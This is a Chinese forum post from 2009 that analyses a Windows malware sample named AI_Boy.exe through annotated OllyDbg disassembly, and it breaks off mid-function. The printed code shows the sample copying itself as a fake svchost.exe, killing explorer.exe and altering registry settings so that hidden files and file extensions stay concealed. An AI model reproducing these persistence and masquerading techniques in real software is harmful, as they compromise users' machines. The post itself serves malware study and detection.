本帖最后由 豪斯登堡新郎 于 2009-6-22 08:33 编辑
文件: Programs AI_Boy.exe
大小: 254021 字节
MD5: AD4A82D68F7831B1FC960D3F1021D11E
SHA1: 3428ADD6219D30891E5441EC27200FE4430258DD
CRC32: 98B01919
开发语言:Microsoft Visual C++ 6.0
卡巴斯基:N/A
瑞星:N/A
金山毒霸:Heur.Win32.Generic_01.h
只做非常简单的行为分析（以下为 OllyDbg 反汇编片段及 API 调用注释，按行为分为 6 段），疏漏之处还请见谅。
1.创建互斥体（main 入口：先创建名为 "TEST_VIRUS_ONE" 的互斥体，紧接着用 GetLastError 是否等于 0xB7 = ERROR_ALREADY_EXISTS 判断是否已有实例在运行，见第 4 段开头 004010D8-004010EA）
004010A0 > \55 push ebp
004010A1 . 8BEC mov ebp, esp
004010A3 . 81EC 08050000 sub esp, 508
004010A9 . 53 push ebx
004010AA . 56 push esi
004010AB . 57 push edi
004010AC . 8DBD F8FAFFFF lea edi, dword ptr [ebp-508]
004010B2 . B9 42010000 mov ecx, 142
004010B7 . B8 CCCCCCCC mov eax, CCCCCCCC
004010BC . F3:AB rep stos dword ptr es:[edi]
004010BE . 8BF4 mov esi, esp
004010C0 . 68 78E14200 push 0042E178 ; /MutexName = "TEST_VIRUS_ONE"
004010C5 . 6A 00 push 0 ; |InitialOwner = FALSE
004010C7 . 6A 00 push 0 ; |pSecurity = NULL
004010C9 . FF15 B0834300 call dword ptr [<&KERNEL32.CreateMute>; \创建一个名为"TEST_VIRUS_ONE"的互斥体
2.获取系统信息（注意：004040B0 处 push -1 / push 0042E8A8 / mov eax,fs:[0] / mov fs:[0],esp 这一序列是 VC6 CRT 启动代码（mainCRTStartup）的标准 SEH 框架，这里的 GetVersion 调用很可能是 CRT 自身初始化，而非样本的恶意行为——待确认）
004040B0 >/$ 55 push ebp
004040B1 |. 8BEC mov ebp, esp
004040B3 |. 6A FF push -1
004040B5 |. 68 A8E84200 push 0042E8A8
004040BA |. 68 D0634000 push 004063D0 ;
004040BF |. 64:A1 0000000>mov eax, dword ptr fs:[0]
004040C5 |. 50 push eax
004040C6 |. 64:8925 00000>mov dword ptr fs:[0], esp
004040CD |. 83C4 A4 add esp, -5C
004040D0 |. 53 push ebx
004040D1 |. 56 push esi
004040D2 |. 57 push edi
004040D3 |. 8965 E8 mov dword ptr [ebp-18], esp
004040D6 |. FF15 5C844300 call dword ptr [<&KERNEL32.GetVersion>; 获取系统信息
3.提权（此处只截取了 LookupPrivilegeValueA 调用。仅查出 SeDebugPrivilege 的 LUID 并不等于提权，必须再经过 OpenProcessToken + AdjustTokenPrivileges 才真正生效，这两步本段未列出，需在后续代码中确认是否存在）
00401B47 |. 51 push ecx ; /pLocalId
00401B48 |. 68 A8E14200 push 0042E1A8 ; |Privilege = "SeDebugPrivilege"
00401B4D |. 6A 00 push 0 ; |SystemName = NULL
00401B4F |. FF15 74834300 call dword ptr [<&ADVAPI32.LookupPriv>; \查询 "SeDebugPrivilege" 对应的 LUID（LookupPrivilegeValueA 本身不改变进程权限，真正提权需后续 AdjustTokenPrivileges，此处未列出）
4.创建病毒文件并运行进程（流程：CreateMutex 后 GetLastError == 0xB7（ERROR_ALREADY_EXISTS）说明已有实例在运行，则只打开同名伪装目录后退出；否则先检查 C:\WINDOWS\svchost.exe 是否已存在，再检查 C:\Windows\zhoutun.txt 是否存在（存在则直接退出），然后复制文件、创建进程，并进入循环结束/重启 explorer.exe）
004010CF . 3BF4 cmp esi, esp
004010D1 . E8 EA2A0000 call 00403BC0
004010D6 . 8BF4 mov esi, esp
004010D8 . FF15 E0834300 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
004010DE . 3BF4 cmp esi, esp
004010E0 . E8 DB2A0000 call 00403BC0
004010E5 . 3D B7000000 cmp eax, 0B7 ; 0xB7 = 183 = ERROR_ALREADY_EXISTS：互斥体已存在说明已有实例在运行，走下面"只打开伪装目录后退出"的分支
004010EA . 0F85 9F000000 jnz 0040118F
004010F0 . 8BF4 mov esi, esp
004010F2 . 68 04010000 push 104 ; /BufSize = 104 (260.)
004010F7 . 68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004010FC . 6A 00 push 0 ; |hModule = NULL
004010FE . FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401104 . 3BF4 cmp esi, esp
00401106 . E8 B52A0000 call 00403BC0
0040110B . 68 EC5D4300 push 00435DEC
00401110 . E8 2B2A0000 call 00403B40
00401115 . 83C4 04 add esp, 4
00401118 . 83E8 68 sub eax, 68
0040111B . 50 push eax
0040111C . 68 EC5D4300 push 00435DEC
00401121 . 68 E85C4300 push 00435CE8
00401126 . E8 15290000 call 00403A40
0040112B . 83C4 0C add esp, 0C
0040112E . 68 EC5D4300 push 00435DEC
00401133 . E8 082A0000 call 00403B40
00401138 . 83C4 04 add esp, 4
0040113B . C680 805C4300>mov byte ptr [eax+435C80], 0
00401142 . 8BF4 mov esi, esp
00401144 . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"（"D7,烂鎈" 是 OllyDbg 按单字节错切显示的 GBK 双字节字符，应为 "桌面\"，即样本位于当前用户桌面下的 Programs 目录——推测；该缓冲区由上面 00403A40 从自身完整路径截取而来）
00401149 . 68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy...."
0040114E . 8D85 FCFEFFFF lea eax, dword ptr [ebp-104] ; |
00401154 . 50 push eax ; |s
00401155 . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
0040115B . 83C4 0C add esp, 0C
0040115E . 3BF4 cmp esi, esp
00401160 . E8 5B2A0000 call 00403BC0
00401165 . 8BF4 mov esi, esp
00401167 . 6A 01 push 1 ; /IsShown = 1
00401169 . 6A 00 push 0 ; |DefDir = NULL
0040116B . 6A 00 push 0 ; |Parameters = NULL
0040116D . 8D8D FCFEFFFF lea ecx, dword ptr [ebp-104] ; |
00401173 . 51 push ecx ; |FileName
00401174 . 68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401179 . 6A 00 push 0 ; |hWnd = NULL
0040117B . FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA "open"：打开上面 wsprintfA 拼出的 "%s.exe AI_Boy...." 路径（推测为与样本同名的伪装目录），随后 xor eax,eax 并跳到 004015C3 退出——已有实例运行时只做这一件事
00401181 . 3BF4 cmp esi, esp
00401183 . E8 382A0000 call 00403BC0
00401188 . 33C0 xor eax, eax
0040118A . E9 34040000 jmp 004015C3
0040118F > 8BF4 mov esi, esp
00401191 . 6A 00 push 0 ; /hTemplateFile = NULL
00401193 . 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401195 . 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401197 . 6A 00 push 0 ; |pSecurity = NULL
00401199 . 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040119B . 68 00000080 push 80000000 ; |Access = GENERIC_READ
004011A0 . 68 301A4300 push 00431A30 ; |FileName = "C:\WINDOWS\svchost.exe"
004011A5 . FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \注意 Mode = OPEN_EXISTING、Access = GENERIC_READ：这里并不是创建文件，而是检查 C:\WINDOWS\svchost.exe 是否已存在；返回 -1（不存在）才进入下面的复制/启动流程，否则跳到 004013BF
004011AB . 3BF4 cmp esi, esp
004011AD . E8 0E2A0000 call 00403BC0
004011B2 . 83F8 FF cmp eax, -1
004011B5 . 0F85 04020000 jnz 004013BF
004011BB . 8BF4 mov esi, esp
004011BD . 68 04010000 push 104 ; /BufSize = 104 (260.)
004011C2 . 68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004011C7 . 6A 00 push 0 ; |hModule = NULL
004011C9 . FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004011CF . 3BF4 cmp esi, esp
004011D1 . E8 EA290000 call 00403BC0
004011D6 . 68 EC5D4300 push 00435DEC
004011DB . E8 60290000 call 00403B40
004011E0 . 83C4 04 add esp, 4
004011E3 . 83E8 68 sub eax, 68
004011E6 . 50 push eax
004011E7 . 68 EC5D4300 push 00435DEC
004011EC . 68 E85C4300 push 00435CE8
004011F1 . E8 4A280000 call 00403A40
004011F6 . 83C4 0C add esp, 0C
004011F9 . 68 EC5D4300 push 00435DEC
004011FE . E8 3D290000 call 00403B40
00401203 . 83C4 04 add esp, 4
00401206 . C680 805C4300>mov byte ptr [eax+435C80], 0
0040120D . 8BF4 mov esi, esp
0040120F . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"
00401214 . 68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy...."
00401219 . 8D95 F4FCFFFF lea edx, dword ptr [ebp-30C] ; |
0040121F . 52 push edx ; |s
00401220 . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401226 . 83C4 0C add esp, 0C
00401229 . 3BF4 cmp esi, esp
0040122B . E8 90290000 call 00403BC0
00401230 . 8BF4 mov esi, esp
00401232 . 6A 01 push 1 ; /IsShown = 1
00401234 . 6A 00 push 0 ; |DefDir = NULL
00401236 . 6A 00 push 0 ; |Parameters = NULL
00401238 . 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C] ; |
0040123E . 50 push eax ; |FileName
0040123F . 68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401244 . 6A 00 push 0 ; |hWnd = NULL
00401246 . FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
0040124C . 3BF4 cmp esi, esp
0040124E . E8 6D290000 call 00403BC0
00401253 . 8BF4 mov esi, esp
00401255 . 6A 00 push 0 ; /hTemplateFile = NULL
00401257 . 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401259 . 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040125B . 6A 00 push 0 ; |pSecurity = NULL
0040125D . 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040125F . 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401264 . 68 CCE04200 push 0042E0CC ; |FileName = "C:\Windows\zhoutun.txt"
00401269 . FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \同样是 OPEN_EXISTING/GENERIC_READ 的存在性检查：若 C:\Windows\zhoutun.txt 已存在（返回值 != -1），则直接 xor eax,eax 跳到 004015C3 返回（00401276-0040127D），相当于感染标记/免疫开关；手工建立该文件可使样本在此处退出
0040126F . 3BF4 cmp esi, esp
00401271 . E8 4A290000 call 00403BC0
00401276 . 83F8 FF cmp eax, -1
00401279 . 74 07 je short 00401282
0040127B . 33C0 xor eax, eax
0040127D . E9 41030000 jmp 004015C3
00401282 > 8BF4 mov esi, esp
00401284 . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"
00401289 . 68 38E04200 push 0042E038 ; |Format = "%s.exe AI_Boy....\\Recycle.exe"
0040128E . 8D8D F8FDFFFF lea ecx, dword ptr [ebp-208] ; |
00401294 . 51 push ecx ; |s
00401295 . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
0040129B . 83C4 0C add esp, 0C
0040129E . 3BF4 cmp esi, esp
004012A0 . E8 1B290000 call 00403BC0
004012A5 . 8BF4 mov esi, esp
004012A7 . 6A 00 push 0 ; /FailIfExists = FALSE
004012A9 . 68 301A4300 push 00431A30 ; |NewFileName = "C:\WINDOWS\svchost.exe"
004012AE . 68 EC5D4300 push 00435DEC ; |ExistingFileName = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs AI_Boy.exe"
004012B3 . FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; \将自身复制到C:\WINDOWS\svchost.exe
004012B9 . 3BF4 cmp esi, esp
004012BB . E8 00290000 call 00403BC0
004012C0 . 8BF4 mov esi, esp
004012C2 . 6A 00 push 0 ; /FailIfExists = FALSE
004012C4 . 68 341B4300 push 00431B34 ; |NewFileName = "C:\WINDOWS\system\svchost.exe"
004012C9 . 8D95 F8FDFFFF lea edx, dword ptr [ebp-208] ; |
004012CF . 52 push edx ; |ExistingFileName
004012D0 . FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; 将 [ebp-208]（由 00401289 处格式串 "%s.exe AI_Boy....\\Recycle.exe" 生成，即伪装目录中的 Recycle.exe）复制到 C:\WINDOWS\system\svchost.exe——注意源文件不是自身，而是 Recycle.exe
004012D6 . 3BF4 cmp esi, esp
004012D8 . E8 E3280000 call 00403BC0
004012DD . C785 B0FCFFFF>mov dword ptr [ebp-350], 44
004012E7 . B9 10000000 mov ecx, 10
004012EC . 33C0 xor eax, eax
004012EE . 8DBD B4FCFFFF lea edi, dword ptr [ebp-34C]
004012F4 . F3:AB rep stos dword ptr es:[edi]
004012F6 . C785 DCFCFFFF>mov dword ptr [ebp-324], 40
00401300 . 8BF4 mov esi, esp
00401302 . 8D85 A0FCFFFF lea eax, dword ptr [ebp-360]
00401308 . 50 push eax ; /pProcessInfo
00401309 . 8D8D B0FCFFFF lea ecx, dword ptr [ebp-350] ; |
0040130F . 51 push ecx ; |pStartupInfo
00401310 . 6A 00 push 0 ; |CurrentDir = NULL
00401312 . 6A 00 push 0 ; |pEnvironment = NULL
00401314 . 6A 00 push 0 ; |CreationFlags = 0
00401316 . 6A 00 push 0 ; |InheritHandles = FALSE
00401318 . 6A 00 push 0 ; |pThreadSecurity = NULL
0040131A . 6A 00 push 0 ; |pProcessSecurity = NULL
0040131C . 68 341B4300 push 00431B34 ; |CommandLine = "C:\WINDOWS\system\svchost.exe"
00401321 . 6A 00 push 0 ; |ModuleFileName = NULL
00401323 . FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \CreateProcessA 启动 C:\WINDOWS\system\svchost.exe（借用系统进程名 svchost.exe 伪装，但路径不在 system32 下，可据此识别）
00401329 . 3BF4 cmp esi, esp
0040132B . E8 90280000 call 00403BC0
00401330 . 8BF4 mov esi, esp
00401332 . 8B95 A4FCFFFF mov edx, dword ptr [ebp-35C]
00401338 . 52 push edx ; /hObject
00401339 . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040133F . 3BF4 cmp esi, esp
00401341 . E8 7A280000 call 00403BC0
00401346 . 8BF4 mov esi, esp
00401348 . 8B85 A0FCFFFF mov eax, dword ptr [ebp-360]
0040134E . 50 push eax ; /hObject
0040134F . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401355 . 3BF4 cmp esi, esp
00401357 . E8 64280000 call 00403BC0
0040135C . 8BF4 mov esi, esp
0040135E . 8D8D A0FCFFFF lea ecx, dword ptr [ebp-360]
00401364 . 51 push ecx ; /pProcessInfo
00401365 . 8D95 B0FCFFFF lea edx, dword ptr [ebp-350] ; |
0040136B . 52 push edx ; |pStartupInfo
0040136C . 6A 00 push 0 ; |CurrentDir = NULL
0040136E . 6A 00 push 0 ; |pEnvironment = NULL
00401370 . 6A 00 push 0 ; |CreationFlags = 0
00401372 . 6A 00 push 0 ; |InheritHandles = FALSE
00401374 . 6A 00 push 0 ; |pThreadSecurity = NULL
00401376 . 6A 00 push 0 ; |pProcessSecurity = NULL
00401378 . 68 301A4300 push 00431A30 ; |CommandLine = "C:\WINDOWS\svchost.exe"
0040137D . 6A 00 push 0 ; |ModuleFileName = NULL
0040137F . FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; 创建进程,运行C:\WINDOWS\svchost.exe
00401385 . 3BF4 cmp esi, esp ;
00401387 . E8 34280000 call 00403BC0
0040138C . 8BF4 mov esi, esp
0040138E . 8B85 A4FCFFFF mov eax, dword ptr [ebp-35C]
00401394 . 50 push eax ; /hObject
00401395 . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040139B . 3BF4 cmp esi, esp
0040139D . E8 1E280000 call 00403BC0
004013A2 . 8BF4 mov esi, esp
004013A4 . 8B8D A0FCFFFF mov ecx, dword ptr [ebp-360]
004013AA . 51 push ecx ; /hObject
004013AB . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004013B1 . 3BF4 cmp esi, esp
004013B3 . E8 08280000 call 00403BC0
004013B8 . 33C0 xor eax, eax
004013BA . E9 04020000 jmp 004015C3
004013BF > 8BF4 mov esi, esp
004013C1 . 68 04010000 push 104 ; /BufSize = 104 (260.)
004013C6 . 68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004013CB . 6A 00 push 0 ; |hModule = NULL
004013CD . FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004013D3 . 3BF4 cmp esi, esp
004013D5 . E8 E6270000 call 00403BC0
004013DA . 68 301A4300 push 00431A30 ; ASCII "C:\WINDOWS\svchost.exe"
004013DF . 68 EC5D4300 push 00435DEC
004013E4 . E8 17460100 call 00415A00
004013E9 . 83C4 08 add esp, 8
004013EC . 85C0 test eax, eax
004013EE . 0F84 84000000 je 00401478
004013F4 . 68 EC5D4300 push 00435DEC
004013F9 . E8 42270000 call 00403B40
004013FE . 83C4 04 add esp, 4
00401401 . 83E8 68 sub eax, 68
00401404 . 50 push eax
00401405 . 68 EC5D4300 push 00435DEC
0040140A . 68 E85C4300 push 00435CE8
0040140F . E8 2C260000 call 00403A40
00401414 . 83C4 0C add esp, 0C
00401417 . 68 EC5D4300 push 00435DEC
0040141C . E8 1F270000 call 00403B40
00401421 . 83C4 04 add esp, 4
00401424 . C680 805C4300>mov byte ptr [eax+435C80], 0
0040142B . 8BF4 mov esi, esp
0040142D . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"
00401432 . 68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy...."
00401437 . 8D95 9CFBFFFF lea edx, dword ptr [ebp-464] ; |
0040143D . 52 push edx ; |s
0040143E . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401444 . 83C4 0C add esp, 0C
00401447 . 3BF4 cmp esi, esp
00401449 . E8 72270000 call 00403BC0
0040144E . 8BF4 mov esi, esp
00401450 . 6A 01 push 1 ; /IsShown = 1
00401452 . 6A 00 push 0 ; |DefDir = NULL
00401454 . 6A 00 push 0 ; |Parameters = NULL
00401456 . 8D85 9CFBFFFF lea eax, dword ptr [ebp-464] ; |
0040145C . 50 push eax ; |FileName
0040145D . 68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401462 . 6A 00 push 0 ; |hWnd = NULL
00401464 . FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
0040146A . 3BF4 cmp esi, esp
0040146C . E8 4F270000 call 00403BC0
00401471 . 33C0 xor eax, eax
00401473 . E9 4B010000 jmp 004015C3
00401478 > E8 BAFBFFFF call 00401037
0040147D . 8BF4 mov esi, esp
0040147F . 8D8D 98FBFFFF lea ecx, dword ptr [ebp-468]
00401485 . 51 push ecx ; /pThreadId
00401486 . 6A 00 push 0 ; |CreationFlags = 0
00401488 . 6A 00 push 0 ; |pThreadParm = NULL
0040148A . 68 2D104000 push 0040102D ; |ThreadFunction = Programs.0040102D
0040148F . 6A 00 push 0 ; |StackSize = 0
00401491 . 6A 00 push 0 ; |pSecurity = NULL
00401493 . FF15 24844300 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00401499 . 3BF4 cmp esi, esp
0040149B . E8 20270000 call 00403BC0
004014A0 . 8985 94FBFFFF mov dword ptr [ebp-46C], eax
004014A6 . 8BF4 mov esi, esp
004014A8 . 8B95 94FBFFFF mov edx, dword ptr [ebp-46C]
004014AE . 52 push edx ; /hObject
004014AF . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004014B5 . 3BF4 cmp esi, esp
004014B7 . E8 04270000 call 00403BC0
004014BC . C785 90FBFFFF>mov dword ptr [ebp-470], 0
004014C6 > B8 01000000 mov eax, 1
004014CB . 85C0 test eax, eax
004014CD . 0F84 EE000000 je 004015C1
004014D3 . E8 37FBFFFF call 0040100F
004014D8 . E8 55FBFFFF call 00401032
004014DD . E8 37FBFFFF call 00401019
004014E2 . 83BD 90FBFFFF>cmp dword ptr [ebp-470], 0
004014E9 . 0F85 B9000000 jnz 004015A8
004014EF . 68 1CE04200 push 0042E01C ; ASCII "c:\WINDOWS\explorer.exe"
004014F4 . E8 2FFBFFFF call 00401028
004014F9 . 83C4 04 add esp, 4
004014FC . 8985 8CFBFFFF mov dword ptr [ebp-474], eax
00401502 . 8BF4 mov esi, esp
00401504 . 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
00401506 . 8B8D 8CFBFFFF mov ecx, dword ptr [ebp-474] ; |
0040150C . 51 push ecx ; |hProcess
0040150D . FF15 28844300 call dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess(hProcess, -1)：结束 explorer.exe（进程句柄由上面 00401028 按路径 "c:\WINDOWS\explorer.exe" 取得，该子函数如何查找/打开进程本段未列出）
00401513 . 3BF4 cmp esi, esp
00401515 . E8 A6260000 call 00403BC0
0040151A . C785 48FBFFFF>mov dword ptr [ebp-4B8], 44
00401524 . B9 10000000 mov ecx, 10
00401529 . 33C0 xor eax, eax
0040152B . 8DBD 4CFBFFFF lea edi, dword ptr [ebp-4B4]
00401531 . F3:AB rep stos dword ptr es:[edi]
00401533 . C785 74FBFFFF>mov dword ptr [ebp-48C], 40
0040153D . 8BF4 mov esi, esp
0040153F . 8D95 38FBFFFF lea edx, dword ptr [ebp-4C8]
00401545 . 52 push edx ; /pProcessInfo
00401546 . 8D85 48FBFFFF lea eax, dword ptr [ebp-4B8] ; |
0040154C . 50 push eax ; |pStartupInfo
0040154D . 6A 00 push 0 ; |CurrentDir = NULL
0040154F . 6A 00 push 0 ; |pEnvironment = NULL
00401551 . 6A 00 push 0 ; |CreationFlags = 0
00401553 . 6A 00 push 0 ; |InheritHandles = FALSE
00401555 . 6A 00 push 0 ; |pThreadSecurity = NULL
00401557 . 6A 00 push 0 ; |pProcessSecurity = NULL
00401559 . 68 1CE04200 push 0042E01C ; |CommandLine = "c:\WINDOWS\explorer.exe"
0040155E . 6A 00 push 0 ; |ModuleFileName = NULL
00401560 . FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \随即用 CreateProcessA 重新启动 c:\WINDOWS\explorer.exe（先杀后重启；这一分支只在 [ebp-470] 计数器为 0 时执行一次，见 004014E2 的判断和 00401599 的自增）
00401566 . 3BF4 cmp esi, esp
00401568 . E8 53260000 call 00403BC0
0040156D . 8BF4 mov esi, esp
0040156F . 8B8D 38FBFFFF mov ecx, dword ptr [ebp-4C8]
00401575 . 51 push ecx ; /hObject
00401576 . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040157C . 3BF4 cmp esi, esp
0040157E . E8 3D260000 call 00403BC0
00401583 . 8BF4 mov esi, esp
00401585 . 8B95 3CFBFFFF mov edx, dword ptr [ebp-4C4]
0040158B . 52 push edx ; /hObject
0040158C . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401592 . 3BF4 cmp esi, esp
00401594 . E8 27260000 call 00403BC0
00401599 . 8B85 90FBFFFF mov eax, dword ptr [ebp-470]
0040159F . 83C0 01 add eax, 1
004015A2 . 8985 90FBFFFF mov dword ptr [ebp-470], eax
004015A8 > 8BF4 mov esi, esp
004015AA . 68 E8030000 push 3E8 ; /Timeout = 1000. ms
004015AF . FF15 30844300 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep(0x3E8) = 1000 ms = 1 秒（不是 10 秒）；004014C6 处 mov eax,1 / test eax,eax 构成永真循环，推测此后跳回 004014C6 反复执行
5.修改注册表：添加启动项、破坏"显示隐藏文件"及"显示已知文件扩展名"选项、禁用 cmd（函数 00401BD0-00401E63 完整列出；所有 RegOpenKeyEx/RegSetValueEx/RegCreateKeyEx 的返回值均未检查，失败也继续往下写）
00401BD0 /> \55 push ebp
00401BD1 |. 8BEC mov ebp, esp
00401BD3 |. 81EC 7C020000 sub esp, 27C
00401BD9 |. 53 push ebx
00401BDA |. 56 push esi
00401BDB |. 57 push edi
00401BDC |. 8DBD 84FDFFFF lea edi, dword ptr [ebp-27C]
00401BE2 |. B9 9F000000 mov ecx, 9F
00401BE7 |. B8 CCCCCCCC mov eax, CCCCCCCC
00401BEC |. F3:AB rep stos dword ptr es:[edi]
00401BEE |. A1 8CE34200 mov eax, dword ptr [42E38C]
00401BF3 |. 8945 F0 mov dword ptr [ebp-10], eax
00401BF6 |. 8B0D 90E34200 mov ecx, dword ptr [42E390]
00401BFC |. 894D F4 mov dword ptr [ebp-C], ecx
00401BFF |. 66:8B15 94E34>mov dx, word ptr [42E394]
00401C06 |. 66:8955 F8 mov word ptr [ebp-8], dx
00401C0A |. A0 96E34200 mov al, byte ptr [42E396]
00401C0F |. 8845 FA mov byte ptr [ebp-6], al
00401C12 |. C745 EC 28E34>mov dword ptr [ebp-14], 0042E328 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
00401C19 |. 8BF4 mov esi, esp
00401C1B |. 8D4D FC lea ecx, dword ptr [ebp-4]
00401C1E |. 51 push ecx ; /pHandle
00401C1F |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C24 |. 6A 00 push 0 ; |Reserved = 0
00401C26 |. 8B55 EC mov edx, dword ptr [ebp-14] ; |
00401C29 |. 52 push edx ; |Subkey
00401C2A |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C2F |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401C35 |. 3BF4 cmp esi, esp
00401C37 |. E8 841F0000 call 00403BC0
00401C3C |. 8BF4 mov esi, esp
00401C3E |. 6A 0B push 0B ; /BufSize = B (11.)
00401C40 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; |
00401C43 |. 50 push eax ; |Buffer
00401C44 |. 6A 01 push 1 ; |ValueType = REG_SZ
00401C46 |. 6A 00 push 0 ; |Reserved = 0
00401C48 |. 68 18E34200 push 0042E318 ; |ValueName = "CheckedValue"
00401C4D |. 8B4D FC mov ecx, dword ptr [ebp-4] ; |
00401C50 |. 51 push ecx ; |hKey
00401C51 |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue。注意 ValueType = 1 即 REG_SZ，长度 0xB = 11 字节，数据是 00401BEE-00401C0F 从 0042E38C 拷到 [ebp-10] 的 11 个字节；正常该值应为 REG_DWORD 1。类型被改成 REG_SZ 后"显示所有文件和文件夹"选项失效，被设为隐藏/系统属性的目录无法显示。原注释 "0x00000001" 与 REG_SZ 类型不符，实际字符串内容需到 0042E38C 处确认
00401C57 |. 3BF4 cmp esi, esp
00401C59 |. E8 621F0000 call 00403BC0
00401C5E |. 8BF4 mov esi, esp
00401C60 |. 8B55 FC mov edx, dword ptr [ebp-4]
00401C63 |. 52 push edx ; /hKey
00401C64 |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C6A |. 3BF4 cmp esi, esp
00401C6C |. E8 4F1F0000 call 00403BC0
00401C71 |. C745 E4 01000>mov dword ptr [ebp-1C], 1
00401C78 |. C745 E0 B8E24>mov dword ptr [ebp-20], 0042E2B8 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt"
00401C7F |. 8BF4 mov esi, esp
00401C81 |. 8D45 E8 lea eax, dword ptr [ebp-18]
00401C84 |. 50 push eax ; /pHandle
00401C85 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C8A |. 6A 00 push 0 ; |Reserved = 0
00401C8C |. 8B4D E0 mov ecx, dword ptr [ebp-20] ; |
00401C8F |. 51 push ecx ; |Subkey
00401C90 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C95 |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401C9B |. 3BF4 cmp esi, esp
00401C9D |. E8 1E1F0000 call 00403BC0
00401CA2 |. 8BF4 mov esi, esp
00401CA4 |. 6A 04 push 4 ; /BufSize = 4
00401CA6 |. 8D55 E4 lea edx, dword ptr [ebp-1C] ; |
00401CA9 |. 52 push edx ; |Buffer
00401CAA |. 6A 04 push 4 ; |ValueType = REG_DWORD
00401CAC |. 6A 00 push 0 ; |Reserved = 0
00401CAE |. 68 A4E24200 push 0042E2A4 ; |ValueName = "UnCheckedValue"
00401CB3 |. 8B45 E8 mov eax, dword ptr [ebp-18] ; |
00401CB6 |. 50 push eax ; |hKey
00401CB7 |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \将 HKLM\...\Explorer\Advanced\Folder\HideFileExt\UnCheckedValue 写为 REG_DWORD 1（[ebp-1C] = 1，见 00401C71）：即使用户取消"隐藏已知文件类型的扩展名"，生效的值仍是 1（隐藏），"xxx.exe" 依旧显示为 "xxx"，便于伪装目录冒充程序
00401CBD |. 3BF4 cmp esi, esp
00401CBF |. E8 FC1E0000 call 00403BC0
00401CC4 |. 8BF4 mov esi, esp
00401CC6 |. 8B4D E8 mov ecx, dword ptr [ebp-18]
